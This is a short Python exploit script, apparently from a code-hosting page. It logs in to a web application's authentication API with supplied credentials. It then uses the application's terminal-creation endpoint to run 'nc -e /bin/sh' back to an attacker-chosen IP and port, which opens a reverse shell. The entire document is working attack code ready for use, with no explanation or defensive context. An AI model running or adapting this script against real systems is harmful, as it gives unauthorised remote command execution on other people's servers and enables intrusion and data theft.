53 lines
No EOL
1 KiB
Python
Executable file
53 lines
No EOL
1 KiB
Python
Executable file
#!/usr/bin/python3
|
|
|
|
import requests
|
|
import sys
|
|
import warnings
|
|
from bs4 import BeautifulSoup
|
|
import json
|
|
|
|
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
|
|
|
|
if len(sys.argv) < 6:
|
|
print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
|
|
exit()
|
|
|
|
url = sys.argv[1]
|
|
username = sys.argv[2]
|
|
password = sys.argv[3]
|
|
ip = sys.argv[4]
|
|
port = sys.argv[5]
|
|
|
|
req = requests.session()
|
|
login_creds = {
|
|
"username":username,
|
|
"password":password,
|
|
"mode":"normal"}
|
|
|
|
|
|
|
|
print("[+] Sendin login request...")
|
|
login = req.post(url+"/api/core/auth", json = login_creds)
|
|
|
|
|
|
if username in login.text:
|
|
|
|
page = url + "/api/terminal/create"
|
|
|
|
payload = {
|
|
|
|
'command':'nc -e /bin/sh ' + ip + ' ' + port ,
|
|
'autoclose':True
|
|
|
|
|
|
}
|
|
payload = json.dumps(payload)
|
|
print("[+] Sending payload...")
|
|
|
|
send_payload = req.post(page, payload)
|
|
|
|
print("[+] Check your listener !...")
|
|
|
|
else:
|
|
print("[-] Wrong credentials or may the system patched.")
|
|
exit() |